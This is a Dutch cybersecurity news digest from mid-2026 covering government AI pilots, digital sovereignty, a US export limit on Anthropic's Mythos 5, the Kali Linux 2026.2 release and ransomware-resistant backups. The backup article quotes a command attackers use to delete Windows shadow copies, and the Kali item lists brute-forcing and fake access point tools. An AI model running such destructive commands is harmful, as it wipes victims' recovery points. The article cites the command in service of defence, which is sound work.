Het eerste risico is de onbedoelde verwerking van persoonsgegevens door invoer van gebruikers. Het UWV beperkt dit risico in de tijdelijke pilot door geen gebruik toe te staan dat gebonden is aan dossiers of personen. Daarnaast worden strikte gebruiksregels en toezicht toegepast. Toegang tot de chatbot wordt uitsluitend verleend aan medewerkers die de e-learning 'geletterdheid op het gebied van AI Basis' succesvol hebben afgerond.

Wat betreft de risico's van vendor lock-in en de geopolitieke afhankelijkheid van niet-Europese aanbieders, stelt de minister dat hiermee rekening wordt gehouden bij de uiteindelijke keuze. Het UWV betrekt deze aspecten expliciet bij de evaluatie en onderzoekt parallel soevereine alternatieven. De minister benadrukt dat de tijdelijke pilot niet automatisch leidt tot voortzetting of uitbreiding van het gebruik van Microsoft Copilot.

Vijlbrief voegde hieraan toe dat publieke organisaties bij de inzet van generatieve AI rekening moeten houden met Europese datasoevereiniteit en strategische autonomie. De huidige pilot is een beperkte en tijdelijke verkenning binnen bestaande contracten en vormt geen keuze voor structurele afhankelijkheid van één leverancier. Het UWV onderzoekt alternatieven, waaronder Europese en soevereine oplossingen, om ervoor te zorgen dat er bij eventuele besluiten voor vervolg meerdere opties beschikbaar zijn. Begin volgend jaar zal de minister meer details delen over de test van Microsoft Copilot bij het UWV.

 

Bron: Microsoft

30 juni 2026 | Defensie investeert fors in defensieve en offensieve cybercapaciteit

Het Ministerie van Defensie van Nederland kondigt aan de komende jaren aanzienlijk te zullen investeren in het versterken van zowel haar defensieve als offensieve cybercapaciteiten. Dit strategische besluit, vastgelegd in de recent gepubliceerde Defensienota 2026, onderstreept de steeds belangrijkere rol van cyber en digitalisering in de moderne oorlogvoering. De ambitie is om een duidelijke voorsprong te creëren op het slagveld door het vermogen van de krijgsmacht te verbeteren om informatie sneller om te zetten in effectieve actie.

Centraal in deze strategie staat de integrale verbinding van diverse militaire domeinen. De krijgsmacht streeft ernaar om sensoren, data, inlichtingen, cybermiddelen, ruimtevaartcapaciteiten en commandovoering naadloos met elkaar te verbinden. Het uiteindelijke doel is dat Defensie hierdoor beter en sneller kan waarnemen, besluiten nemen en opereren. Een concreet voorbeeld van deze aanpak is de investering in het gebruik van kunstmatige intelligentie (AI), waarmee Defensie de mogelijkheid krijgt om beslissingen sneller en effectiever te nemen dan potentiële tegenstanders. Tegelijkertijd worden er middelen vrijgemaakt voor het verbeteren van de algemene cyberbeveiliging en de implementatie van geavanceerde versleutelingstechnieken om de eigen netwerken en data te beveiligen.

De uitbreiding van de defensieve cybercapaciteiten heeft als primair doel het beschermen van cruciale nationale belangen. Dit omvat onder andere de beveiliging van vitale infrastructuur en de defensieleveranciers die essentieel zijn voor de nationale veiligheid. Een sleutelelement hierin is het proactief weerstand bieden aan diverse cyberdreigingen. Deze proactieve houding speelt een belangrijke rol bij het verstoren van hybride dreigingen, zoals spionage en sabotage, die de stabiliteit en veiligheid van het land kunnen ondermijnen.

Naast de defensieve versterking, investeert Defensie ook in offensieve cybercapaciteiten. Deze stelt de krijgsmacht in staat om tegenstanders gericht te beïnvloeden en aan te vallen binnen het cyberdomein. Deze offensieve mogelijkheden worden als essentieel beschouwd, zeker gezien de huidige verslechterende veiligheidssituatie wereldwijd. De voorbereiding op een mogelijk toekomstig conflict vindt immers reeds plaats in het cyberdomein, waardoor een actieve aanwezigheid en handelingsbekwaamheid hierin van cruciaal belang is. Om deze technologische ontwikkelingen adequaat bij te benen en een blijvend strategisch voordeel op het digitale slagveld te verzekeren, zet Defensie tevens in op verdere kennisontwikkeling, innovatie en het aanbieden van gespecialiseerde opleidingen voor haar personeel.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

30 juni 2026 | Deloitte, IBM en Red Hat bundelen krachten voor software supply chain beveiliging

Deloitte, IBM en Red Hat hebben een samenwerking aangekondigd die gericht is op het versterken van de beveiliging van softwaretoeleveringsketens. Deze alliantie moet organisaties beter beschermen tegen de toenemende dreiging van geautomatiseerde cyberaanvallen. Deloitte sluit zich aan bij Project Lightwell, een initiatief van IBM en Red Hat, waaraan recent ook Palo Alto Networks deelnam.

Als integratiepartner brengt Deloitte haar expertise in cyberrisico's en beveiligde softwarearchitectuur in bij Lightwell. Dit project combineert een open source beveiligingsmodel met actieve engineering. Het platform is ontworpen om dreigingsmeldingen stroomopwaarts te coördineren met onafhankelijke beheerders. Tegelijkertijd worden patches ontwikkeld, getest en direct toegepast op de specifieke softwareversies die in gebruik zijn. Deze aanpak stelt organisaties in staat om updates voor beveiliging te ontvangen zonder de noodzaak van disruptieve, grootschalige upgrades.

Adnan Amjad, Cyberleider bij Deloitte in de Verenigde Staten, benadrukt dat exploits niet wachten op handmatige patchprocessen en dat de reactie van bedrijven evenmin kan wachten. Dankzij de gezamenlijke aanpak worden gevalideerde patches snel uitgerold voor de exacte softwareversies die in productie draaien. Dit verkleint het venster waarin kwetsbaarheden kunnen worden uitgebuit aanzienlijk, vooral in complexe IT-omgevingen waar traditionele patchcycli vaak tot vertraging leiden.

De samenwerking richt zich op het creëren van continue zichtbaarheid van alle softwarecomponenten binnen een organisatie. Dit omvat zowel eigen ontwikkelde code, open source code als code van derden. Door voortdurende monitoring en scanning wordt nauwkeurig in kaart gebracht welke code waar draait en welke functies het ondersteunt. Bovendien maakt contextuele prioritering het mogelijk om de echte dreigingen te onderscheiden van minder relevante signalen, op basis van ernst, blootstelling en exploiteerbaarheid. De geautomatiseerde validatie van patches door IBM en Red Hat, gecombineerd met de Forward Deployed Engineers van Deloitte, zorgt ervoor dat fixes snel en zonder verstoringen worden uitgerold.

 

Bron: ITdaily.be

30 juni 2026 | AP-voorzitter Wolfsen waarschuwt voor privacyrisico's chatbots

Aleid Wolfsen, de vertrekkend voorzitter van de Autoriteit Persoonsgegevens (AP), heeft in een interview met Trouw zijn zorgen geuit over de privacyrisico's van chatbots. Volgens Wolfsen, die volgende maand zijn functie neerlegt na tien jaar leiding te hebben gegeven aan de toezichthouder, delen mensen onbewust een grote hoeveelheid persoonlijke informatie met deze systemen. Deze gegevens, die gebruikt worden voor het trainen van modellen voor artificiële intelligentie (AI), zijn volgens hem vrijwel onmogelijk te verwijderen.

Wolfsen benadrukt dat het delen van "het hele hebben en houden" met chatbots de macht en invloed van technologiebedrijven aanzienlijk vergroot. Hij waarschuwt dat de verzamelde data zowel positief als negatief ingezet kan worden. Om een tegenwicht te bieden aan de dominantie van buitenlandse techreuzen, pleit Wolfsen ervoor dat Europa, en Nederland in het bijzonder, meer investeert in de ontwikkeling van AI. Hij stelt dat er voldoende kennis en "slimme techies" aanwezig zijn binnen Europa om hierin een leidende rol te spelen.

Tijdens het afscheidsinterview herhaalde de AP-voorzitter ook zijn eerdere kritiek op de onderbezetting van de Autoriteit Persoonsgegevens. Deze personeelstekorten belemmeren de organisatie om effectief toezicht te houden, waardoor spontane controles bij bedrijven en overheidsinstanties niet uitvoerbaar zijn. Wolfsen merkte op dat hoewel veel overheidsinstanties, zoals de politie, het Openbaar Ministerie en de rechterlijke macht, onderbezet zijn, de AP "onder-onderbezet" is.

De toezichthouder heeft daarnaast moeite om de jaarlijks toenemende stroom aan privacyklachten, veroorzaakt door de digitalisering van de samenleving en het groeiende aantal datalekken, adequaat af te handelen. "We kunnen dat tempo niet bijhouden," aldus Wolfsen. Hij wordt in zijn functie opgevolgd door Geert Potjewijd.

 

Bron: Trouw

30 juni 2026 | VS herstelt toegang tot AI model Mythos voor vitale infrastructuur

De Amerikaanse overheid heeft besloten om bepaalde Amerikaanse organisaties opnieuw toegang te verlenen tot het AI model Mythos 5 van Anthropic. Deze beslissing volgt op een eerder exportverbod dat twee weken geleden werd ingesteld, waarbij Anthropic gedwongen werd de AI modellen Fable 5 en Mythos 5 voor alle klanten uit te schakelen. De maatregel was ingegeven door zorgen over de nationale veiligheid.

Volgens verklaringen van Anthropic en de Amerikaanse minister van Handel Howard Lutnick, had de Amerikaanse regering een exportverbod opgelegd. Dit verbood de beschikbaarheid van de AI modellen aan andere landen en buitenlandse individuen, inclusief niet-Amerikaans personeel van Anthropic zelf. De kern van de bezwaren lag in het vermogen van de AI modellen om kwetsbaarheden in software op te sporen, wat potentieel risico's voor de nationale veiligheid met zich mee zou kunnen brengen indien ze in verkeerde handen vallen.

Via sociale media, specifiek het platform X, heeft Anthropic bekendgemaakt dat de Amerikaanse regering nu toestemming heeft gegeven om Mythos 5 weer beschikbaar te stellen. Deze hernieuwde toegang is echter beperkt tot een select aantal Amerikaanse organisaties die een cruciale rol spelen in het beheer en de bescherming van vitale infrastructuur. Anthropic heeft tevens aangegeven dat het in nauwe samenwerking met de autoriteiten blijft zoeken naar mogelijkheden om zowel Mythos 5 als Fable 5 op termijn weer voor algemeen gebruik beschikbaar te maken.

Minister Lutnick bevestigde in een brief aan Anthropic dat "bepaalde vertrouwde partners" opnieuw toegang krijgen tot Mythos 5, al zijn de identiteiten van deze partners niet openbaar gemaakt. Het oorspronkelijke exportverbod leidde tot aanzienlijke kritiek vanuit zowel de politiek als de expertgemeenschap. In Nederland resulteerde dit zelfs in vragen die in de Tweede Kamer werden gesteld, wat de bredere internationale impact van het besluit onderstreepte.

Sam Altman, de CEO van OpenAI, heeft op X zijn standpunt kenbaar gemaakt door te stellen dat regeringen niet zouden moeten bepalen wie wel of geen toegang krijgt tot AI modellen. Dit benadrukt de discussie over de balans tussen nationale veiligheid en de vrije beschikbaarheid van geavanceerde technologieën zoals AI. De ontwikkelingen rondom Mythos 5 en Fable 5 illustreren de groeiende complexiteit van regelgeving en controle in het snel evoluerende landschap van kunstmatige intelligentie en cybersecurity.

 

Bron: FBI | Bron 2: semgrep.dev

01 juli 2026 | Europese digitale ID-wallets bekritiseerd om afhankelijkheid van Big Tech

De wallets voor de Europese digitale identiteit, die burgers in de gehele Europese Unie in staat moeten stellen zich te identificeren en elektronische documenten te delen, zijn een "cadeau voor Apple en Google". Deze kritiek komt van de Amsterdamse non-profitorganisatie Waag Futurelab. De Europese Commissie presenteerde in 2021 plannen voor de invoering van deze digitale identiteit, waarbij burgers via een speciale wallet applicatie op smartphones en andere apparaten toegang krijgen tot publieke en private diensten. Grote platformen zullen verplicht worden deze nieuwe Europese digitale identiteit te accepteren.

De controverse ontstaat doordat de wallets gebruikmaken van diensten zoals de Google Play Integrity API en Managed Device Attestation van Apple. Deze diensten zijn bedoeld om de integriteit van de onderliggende hardware te waarborgen, zodat app-ontwikkelaars kunnen controleren of hun applicatie niet op gemanipuleerde hardware draait. Echter, de Play Integrity API van Google controleert niet alleen de hardware-integriteit, maar ook of het toestel een door Google gelicenseerde versie van Android draait. Alternatieve Android-versies worden hierbij als een potentieel veiligheidsprobleem bestempeld. Bovendien wordt gecheckt of de betreffende app vanuit de Google Play Store is geïnstalleerd.

Volgens Waag Futurelab sluit het ontwerp van Googles dienst alternatieve Android-versies buiten en moedigt het gebruikers aan om alleen applicaties vanuit de Google Play Store te installeren, waar een Google account vereist is om in te loggen. De organisatie noemt dit een "duidelijke schending van de Digital Market Act (DMA)". Hoewel er een open alternatief voor de Play Integrity API beschikbaar is, wordt dit naar verluidt genegeerd. Waag Futurelab waarschuwt dat, ondanks de uitgesproken wens van de EU om het monopolie van Big Tech te doorbreken, Europese lidstaten het risico lopen Googles ecosysteem te versterken door de Google Play Integrity API in de architectuur van hun digitale ID-wallet te integreren.

Waag Futurelab benadrukt dat ID-wallets als publieke infrastructuur voor toegang tot belangrijke publieke diensten moeten dienen. Dit impliceert dat ze interoperabel moeten zijn tussen verschillende apparaten en besturingssystemen, vrij van vendor lock-in. Het gebruik van de Play Integrity API wordt niet door de EU verplicht, maar wel aanbevolen. Dit heeft geleid tot een versnipperde aanpak, waarbij sommige landen de API niet gebruiken en andere deze verplichten.

De Amsterdamse organisatie pleit ervoor dat, als Europa digitale autonomie serieus neemt, de attestatie van Google en Apple volledig uit het Architecture Reference Framework moet worden verwijderd. In plaats daarvan zouden open, hardware gebaseerde attestatie-mechanismen verplicht moeten worden gesteld. Als voorbeeld wordt Zwitserland genoemd, dat vanwege zorgen over privacy, datasoevereiniteit en vrije keus Google Play Integrity heeft laten vallen.

 

Bron: Waag Futurelab | Bron 2: grapheneos.org | Bron 3: reports.exodus-privacy.eu.org

01 juli 2026 | Rapport waarschuwt overheid voor risico's afhankelijkheid van VMware

Een nieuw rapport, opgesteld in opdracht van het Ministerie van Binnenlandse Zaken, waarschuwt Nederlandse overheidsinstanties voor de risico's die voortvloeien uit hun afhankelijkheid van virtualisatiesoftware van VMware. Het rapport, getiteld 'Op weg naar Weerbare Virtualisatie', bespreekt tevens mogelijkheden om digitale autonomie op dit gebied te bevorderen. VMware is een significante leverancier van virtualisatiesoftware, waarvan ook de Nederlandse overheid veelvuldig gebruikmaakt.

Begin 2024 heeft Broadcom, de nieuwe eigenaar van VMware, het traditionele licentiemodel van VMware, gebaseerd op "perpetual" licenties, vervangen door een abonnementsmodel. Waar organisaties in het oude model een eeuwigdurend gebruiksrecht hadden met opties voor contracten inzake updates, patches, bugfixes en technische support, kent het nieuwe abonnementsmodel dit eeuwigdurend recht niet meer. Organisaties mogen de software uitsluitend gebruiken zolang het abonnement actief is. De onderzoekers benadrukken dat "zonder actief abonnement de organisatie toegang tot de software en het recht om het te mogen gebruiken verliest, wat resulteert in verlies aan functionaliteit."

Volgens de onderzoekers leidt dit nieuwe abonnementsmodel tot hogere kosten, met periodieke prijsstijgingen van circa 10 procent per jaar, geforceerde upgrades, een mogelijke verdere vendor lock-in en verlies aan functionaliteit indien het abonnement wordt beëindigd. Zij stellen dat de afhankelijkheid van IT-leveranciers organisaties zowel financieel als operationeel kwetsbaar kan maken. Dit risico kan kritieke processen binnen de Nederlandse overheid bedreigen wanneer software niet deugdelijk functioneert of niet meer beschikbaar is.

De huidige geopolitieke situatie versterkt de noodzaak om strategische afhankelijkheden snel te verkleinen. Het rapport stelt dat de afhankelijkheid van niet-Europese technologiebedrijven, met name Amerikaanse aanbieders, door recente internationale spanningen en incidenten een belangrijk thema is geworden. Er groeit op zowel nationaal als Europees niveau een besef dat digitale autonomie en soevereiniteit essentieel zijn voor de continuïteit van publieke dienstverlening en de bescherming van publieke waarden.

Het rapport, dat werd opgesteld door Accenture, heeft drie hoofddoelstellingen. Ten eerste inzicht bieden in de keuzes bij het heroverwegen van een virtualisatieplatform, inzicht verkrijgen in hoe overheidsorganisaties minder afhankelijk kunnen worden van specifieke leveranciers, en strategisch inzicht bieden met betrekking tot autonomie en weerbaarheid om geopolitieke afhankelijkheden te verminderen.

De onderzoekers concluderen dat het opbouwen van meer autonomie en weerbaarheid een langdurige inspanning vereist. Door de veranderde geopolitieke situatie moet de overheid niet alleen kijken naar de beste kwaliteit tegen de laagste kosten, maar ook het verminderen van geopolitieke afhankelijkheid laten meewegen. Tevens wordt aangegeven dat de overheid niet alles zelf kan en ook niet moet willen. Naast het opbouwen van eigen expertise is het tevens aan te bevelen, evenals het denken in termen van het opbouwen van een ecosysteem. De overheid kan voorwaarden in de markt scheppen om oplossingen te ontwikkelen die haar vooruithelpen en interessant zijn voor marktpartijen om in te investeren.

 

Bron: Accenture

01 juli 2026 | Kali Linux 2026.2 introduceert negen nieuwe tools en NetHunter updates

Kali Linux 2026.2, de tweede belangrijke release van dit jaar, is nu beschikbaar voor download. Deze versie brengt negen nieuwe tools met zich mee en aanzienlijke verbeteringen voor Kali NetHunter, het penetratietestplatform voor Android-apparaten. Kali Linux is specifiek ontworpen voor cybersecurity professionals en ethische hackers, en biedt een uitgebreide set aan tools voor beveiligingsaudits, penetratietesten en netwerkonderzoek. De distributie is zowel verkrijgbaar als een installeerbaar besturingssysteem als een live omgeving, en ondersteunt een breed scala aan hardware, inclusief Raspberry Pi-apparaten en Android-telefoons via Kali NetHunter.

Naast de introductie van nieuwe tools en de updates voor het NetHunter-platform, heeft het Kali Team ook verbeterde helper scripts, updates voor desktopomgevingen en aanpassingen aan het opstartproces van virtuele machines (VM's) toegevoegd. De Kali-kernel is bijgewerkt naar versie 6.19, met de 7.0-kernel beschikbaar in de kali-experimental tak.

De negen nieuwe tools die aan de netwerkrepositories zijn toegevoegd, zijn:

*   **arsenal-ng**: Een commandobibliotheek gebaseerd op Go, uitgerust met meer dan 200 cybersecurity cheat-sheets.

*   **hydra-gtk**: Een opnieuw toegevoegde, zeer snelle bruteforcer voor netwerkinloggegevens, voorzien van een GUI gebaseerd op GTK+.

*   **legba**: Een multiprotocol bruteforcer voor inloggegevens, wachtwoord sprayer en enumerator.

*   **oletools**: Een set tools voor het analyseren van MS OLE2-bestanden en MS Office-documenten.

*   **penelope**: Een krachtige shell handler.

*   **shell-gpt**: Een command-line productiviteitstool aangedreven door grote taalmodellen met AI.

*   **tailscale**: Een beveiligd connectiviteitsplatform.

*   **tookie-osint**: Een OSINT informatieverzameltool voor het vinden van accounts op sociale media.

*   **uro**: Een tool om URL's op te schonen voor crawling en pentesten.

De helper scripts voor services zijn eveneens geüpdatet, wat het beheer van services vereenvoudigt, inclusief het controleren van de status, het volgen van de servicestatus, het weergeven van standaard inloggegevens en het verkrijgen van informatie over de toegang tot actieve services.

Een belangrijke wijziging betreft de vooraf gebouwde VM-images van Kali Linux. Deze bevatten vanaf deze release geen grafische firmware meer. De installatie-images kunnen nu detecteren wanneer de installatie plaatsvindt in een virtuele machine, om te voorkomen dat grafische firmware onnodig wordt geïnstalleerd. Dit resulteert in een aanzienlijk kleinere initrd van 60 MB voor VM-gebruikers en een verdrievoudiging van de opstartsnelheid, getest op een QEMU VM op een Linux-host. Voor baremetal gebruikers blijven de zaken ongewijzigd, met een 200 MB initrd met alle grafische firmware vooraf geïnstalleerd.

De desktopomgevingen van Kali zijn ook bijgewerkt; de distributie wordt nu geleverd met GNOME 50 en KDE Plasma 6.6.

De NetHunter-updates omvatten onder andere ondersteuning voor Magisk standalone kernel flashing, nieuwe kernels met qcacld3 injectieondersteuning, kernels voor meer versies en telefoons, en bare metal ondersteuning op meer telefoons via NetHunter Pro. De Kali NetHunter-app start nu onmiddellijk op, en diverse bugs met de custom commands en chroot manager zijn opgelost. Een nieuw EvilTwin (Wi-Fi Fake AP) tabblad is toegevoegd met een captive portal voor wachtwoordverificatie, wat ook leidde tot een noodzakelijke iptables fix waardoor Android Hotspot nu correct werkt na het gebruik van Wifipumpkin3 of EvilTwin.

Om Kali Linux 2026.2 te verkrijgen, kunnen gebruikers hun bestaande installatie upgraden, een platform selecteren, of ISO-images direct downloaden voor nieuwe installaties en live distributies. Kali-gebruikers die willen upgraden vanaf een eerdere versie, vinden de benodigde upgrade-commando's in de officiële release-aankondiging op de website van Kali.

Gebruikers van Kali op Windows Subsystem for Linux wordt geadviseerd om te upgraden naar WSL 2 voor betere ondersteuning van grafische apps. De volledige changelog van de Kali Linux 2026.2-release is beschikbaar op de website van Kali.

 

Bron: Kali Linux

01 juli 2026 | Avans Hogeschool en Politie waarschuwen mkb voor gestolen wachtwoorden

Avans Hogeschool en de Politie Oost-Brabant hebben een gezamenlijk project gelanceerd om Nederlandse mkb-bedrijven te waarschuwen voor gelekte inloggegevens die online circuleren. Dit onderzoeksproject, dat gisteren, op dinsdag 30 juni 2026, werd aangekondigd, richt zich op het identificeren van combinaties van e-mailadressen en wachtwoorden in openbaar beschikbare datasets. Zodra deze gegevens worden gekoppeld aan Nederlandse mkb-bedrijven, ontvangen de getroffen ondernemers een waarschuwingsmail.

De e-mail van Avans Hogeschool bevat gedetailleerde informatie over de risico's van gecompromitteerde inloggegevens en biedt concrete beveiligingsadviezen. De politie heeft benadrukt dat Avans Hogeschool deze werkzaamheden geheel zelfstandig uitvoert. De politie verstrekt geen gegevens aan Avans en ontvangt ook geen individuele bedrijfsgegevens van de hogeschool. Wel adviseert de politie waar nodig over specifieke onderdelen binnen het onderzoeksproject om de effectiviteit te waarborgen.

Het primaire doel van dit initiatief is het voorkomen van verder slachtofferschap onder mkb-bedrijven. Door tijdig te informeren, krijgen ondernemers de gelegenheid om hun wachtwoorden te wijzigen en aanvullende beveiligingsmaatregelen te implementeren voordat cybercriminelen misbruik kunnen maken van de gelekte gegevens. De ambitie van het project is om in de komende vijf jaar duizenden ondernemers te bereiken en te waarschuwen. De politie hoopt dat de waarschuwingen serieus worden genomen en dat ondernemers de noodzakelijke stappen ondernemen om hun digitale veiligheid te verbeteren.

Naast het directe waarschuwingssysteem heeft het onderzoeksproject, dat in opdracht van de Politie Oost-Brabant door Avans Hogeschool wordt uitgevoerd, bredere doelen. Het moet leiden tot de ontwikkeling van een actuele database waarin relevante datalekken worden geregistreerd en continu worden bijgehouden. Verder beoogt het project een formele alarmeringsprocedure te ontwikkelen om slachtoffers van online criminaliteit na een datalek efficiënt te kunnen informeren. Ook het opstellen van praktische adviezen en concrete handelingsopties voor ondernemers maakt deel uit van het onderzoek. Avans Hogeschool, die inmiddels is begonnen met het versturen van de waarschuwingen, stelt dat dit onderzoek zich richt op een preventieve strategie die de cyberweerbaarheid van het mkb in Nederland aanzienlijk moet versterken.

 

Bron: Avans Hogeschool en Politie Oost-Brabant

01 juli 2026 | Noyb: Amerikaanse uitspraak ondermijnt EU-VS gegevensuitwisseling

De privacyorganisatie noyb stelt dat een recente uitspraak van het Amerikaans hooggerechtshof de doorgifte van persoonsgegevens vanuit de Europese Unie naar de Verenigde Staten onmogelijk maakt. Max Schrems, oprichter van noyb en bekend privacy-activist, roept de Europese Commissie op om het adequaatheidsbesluit met betrekking tot de Verenigde Staten onmiddellijk in te trekken.

De doorgifte van persoonsgegevens naar landen buiten de Europese Unie is enkel toegestaan onder specifieke voorwaarden. Eén van deze voorwaarden is een adequaatheidsbesluit, waarbij de Europese Commissie vaststelt dat het betreffende land een beschermingsniveau biedt dat vergelijkbaar is met de Algemene Verordening Gegevensbescherming (AVG). De Verenigde Staten is één van de vijftien landen waarvoor een dergelijk besluit is genomen, zoals de Autoriteit Persoonsgegevens meldt. Een cruciale eis van de EU is de aanwezigheid van een onafhankelijke toezichthoudende autoriteit. Hiertoe heeft de VS de Federal Trade Commission (FTC) aangewezen.

Het Amerikaans hooggerechtshof heeft echter nu geoordeeld dat de onafhankelijkheid van de FTC ongrondwettig is. Volgens noyb stort hiermee het fundament van het EU-US Data Privacy Framework (DPF) in elkaar, aangezien de EU in bijna alle gevallen vertrouwde op de "onafhankelijkheid" van de FTC als privacywaakhond. Het DPF is de huidige overeenkomst voor data-uitwisseling tussen de EU en de VS, die volgde op de ongeldigverklaring van twee eerdere overeenkomsten, "Safe Harbor" en "Privacy Shield", door het Europees Hof van Justitie.

Schrems benadrukt dat, zelfs binnen de logica van de Europese Commissie, de basis voor elke overeenkomst voor datadoorgifte tussen de EU en de VS is komen te vervallen. Hij dringt erop aan dat de Commissie "de Amerikaanse cloud verlaat", een stap die hij als onvermijdelijk beschouwt. Schrems spreekt van een "juridisch kaartenhuis" dat onder druk van de industrie is gebouwd en nu is ingestort. Hij voegt toe dat de uitspraak van het Amerikaanse hooggerechtshof ook consequenties heeft voor data-uitwisseling die gebaseerd is op modelcontracten en bedrijfsvoorschriften. Noyb heeft de Europese Commissie reeds per brief verzocht de overeenkomst met de VS in te trekken.

Beveiligingsexpert Bert Hubert onderschrijft de ernst van de situatie. Hij stelt dat het vertrouwen in "onafhankelijk toezicht" in de VS, waarop het EU-US Data Privacy Framework rust, na de uitspraak van het hooggerechtshof "helemaal over" is. Volgens Hubert kan de Europese Commissie de overeenkomst opzeggen, of kan een rechter hiertoe besluiten.

 

Bron: Noyb | Bron 2: disconnectusa.org | Bron 3: mediahuis.com

02 juli 2026 | Essentiële strategieën voor ransomwarebestendige backups in bedrijven

Moderne aanvallen met ransomware richten zich niet langer uitsluitend op het versleutelen van bestanden op desktops. Indien back-ups onbeperkt toegankelijk zijn via Active Directory of het netwerk, kunnen ze net zo kwetsbaar zijn. Om te overleven in dergelijke omstandigheden, hebben bedrijven een robuuste ransomwarebestendige back-upstrategie nodig die aanvallers niet kunnen kraken.

Een ransomwarebestendige back-up is een strategische benadering van gegevensbescherming die de continuïteit van de bedrijfsvoering garandeert, zelfs na een compromittering van het bedrijfsnetwerk. Het primaire doel is om IT-teams in staat te stellen de infrastructuur volledig te herstellen zonder losgeld te betalen. Deze aanpak rust op drie pijlers, namelijk onveranderlijkheid (immutability), isolatie en geverifieerd herstel. Onveranderlijkheid betekent dat back-ups worden beveiligd met Write Once, Read Many (WORM)-technologie, waardoor gegevens gedurende een bepaalde periode niet kunnen worden gewijzigd. Isolatie houdt in dat back-ups fysiek gescheiden zijn van het productienetwerk, wat de opslag beschermt bij een cyberaanval. Geverifieerd herstel bevestigt de geldigheid van een back-up door deze in een geïsoleerde sandbox te implementeren en de integriteit van de gegevens te controleren.

Traditionele back-upoplossingen schieten vaak tekort tegen geavanceerde ransomware, omdat ze zijn ontworpen voor problemen zoals defecte harde schijven of menselijke fouten, niet voor cybercriminelen. Ze zijn kwetsbaar door blootstelling van netwerkgekoppelde opslag (NAS), hergebruik van inloggegevens na phishing, het niet detecteren van versleutelde bestanden die worden gekopieerd, en ongetest herstel, wat leidt tot fouten en trage processen.

Tijdens de 'dwell time', de periode tussen de initiële inbraak en de start van kwaadaardige activiteiten, brengen hackers de infrastructuur volledig in kaart. Ze gebruiken destructieve methoden zoals het verwijderen van shadowkopieën (bijvoorbeeld via `vssadmin delete shadows /all /quiet` op Windows), het uitschakelen van back-upagenten (van oplossingen zoals Veeam, Commvault, Veritas), het oogsten van inloggegevens via geheugendumps en het manipuleren van geplande taken om herstelpunten te omzeilen.

Om deze dreigingen het hoofd te bieden, zijn zeven strategieën essentieel voor IT-teams:

1.  **De 3-2-1-1-0 back-upregel toepassen:** Een modernisering van de klassieke 3-2-1 regel. Dit houdt in dat u drie kopieën van uw gegevens (één werkend, twee back-ups), twee verschillende mediatypen (bijvoorbeeld lokale NVMe-array en cloudobjectopslag), één kopie op een externe fysieke locatie, één onveranderlijke of fysiek geïsoleerde kopie, en nul fouten door regelmatige verificatie.

2.  **Onveranderlijke en 'air-gapped' opslag gebruiken:** Implementeer onveranderlijke opslag met WORM-technologie op API-niveau. Tape-opslag, die fysiek geen IP-adres heeft, is over het netwerk niet te versleutelen. Creëer ook geïsoleerde herstelomgevingen waar gegevens via een speciale gateway worden gerepliceerd.

3.  **Zero Trust uitbreiden naar back-up en herstel:** Een Zero Trust back-uparchitectuur vertrouwt niets binnen het bedrijfsperimeter. Dit vereist meervoudige authenticatie (MFA) voor de back-upbeheerconsole, toegang met minimale privileges (least privilege access), en just-in-time toegang tot repository-instellingen, goedgekeurd door een tweede medewerker (vierogenprincipe).

4.  **Back-upinfrastructuur scheiden van productienetwerken:** Netwerksegmentatie is cruciaal om laterale beweging te voorkomen. Isoleer al het back-upverkeer in aparte VLAN's, blokkeer externe beheerprotocollen zoals RDP en SSH met firewallregels, en plaats de back-upinfrastructuur in een apart Active Directory-forest of een Workgroup.

5.  **Geautomatiseerd back-up testen en herstelverificatie:** Geautomatiseerde tests zijn van vitaal belang. Moderne Backup en Disaster Recovery (BCDR)-oplossingen maken het mogelijk om virtuele machines in een geïsoleerd testnetwerk (sandbox) te implementeren en belangrijke services (zoals SQL Server) te testen. Controleer regelmatig de integriteit van gegevens met checksums (bijvoorbeeld SHA-256).

6.  **Monitoren op afwijkingen in back-upgedrag:** Als ransomware begint met het versleutelen van bestanden, zal het gedrag van de volgende back-upsessie drastisch veranderen. Monitor op ongebruikelijke wijzigingspercentages van bestanden en afwijkingen in de back-upgrootte als indicatoren van een compromittering.

7.  **Inloggegevens en beheerinterfaces beveiligen:** Sluit open deuren voor hackers door privileged access management (PAM) toe te passen voor wachtwoorden van lokale back-upserveraccounts. Schakel alle onnodige protocollen, services, componenten en webinterfaces uit op back-upproxy's en repositories.

 

Bron: Microsoft | Bron 2: itgoat.com

02 juli 2026 | Nederlands kabinet werkt aan soevereine open source chatapp

Het Nederlandse kabinet werkt nog steeds aan de ontwikkeling van een eigen, soevereine chatapplicatie die open source zal zijn. Dit heeft staatssecretaris Aerdts voor Digitale Economie bekendgemaakt in antwoord op Kamervragen van FVD-Kamerlid Houwelingen. Naast de plannen voor de eigen app, vindt er momenteel ook een proef plaats met een Europese zakelijke chatapp.

De Kamervragen van Houwelingen waren ingegeven door recente berichtgeving van Bloomberg, waarin Meta wordt beschuldigd van het kunnen lezen van WhatsApp-berichten en waarin melding wordt gemaakt van een onderzoek door Amerikaanse autoriteiten naar claims dat Meta toegang heeft tot deze berichten. Staatssecretaris Aerdts erkent dat "doorbreking van verwachte beveiliging in algemene zin zorgwekkend is." Zij benadrukt echter dat berichten in WhatsApp tussen verzender en ontvanger "in principe versleuteld zijn." Volgens Aerdts zijn alleen berichten die specifiek naar de Meta AI worden gestuurd via het commando "@Meta AI" inzichtelijk voor Meta. De overige berichtenconversatie blijft volgens Meta versleuteld, hoewel WhatsApp wel toegang heeft tot verkeersgegevens, oftewel metadata.

Kamerlid Houwelingen had de staatssecretaris ook gevraagd of zij bereid was onafhankelijk onderzoek te laten uitvoeren naar de end-to-end versleuteling van WhatsApp-berichten en de toegankelijkheid daarvan voor Meta, diens medewerkers, opdrachtnemers of andere derden. Aerdts gaf hierop aan dat de inspanningen van de Rijksoverheid gericht zijn op het realiseren van eigen, veilige digitale voorzieningen. Zij bevestigde dat er een plan in ontwikkeling is voor een eigen, soevereine chatapplicatie specifiek voor de communicatie tussen ambtenaren onderling.

De bewindsvrouw voegde eraan toe dat er momenteel een pilot gaande is met een niet nader gespecificeerde Europese zakelijke chatapp. Deze applicatie wordt getest door een beperkte groep gebruikers. De opgedane kennis en ervaringen uit deze pilot zullen worden gebruikt bij de ontwikkeling van de eigen soevereine chatapplicatie voor ambtenaren. Een belangrijk aspect van de toekomstige oplossing is dat deze open source zal zijn.

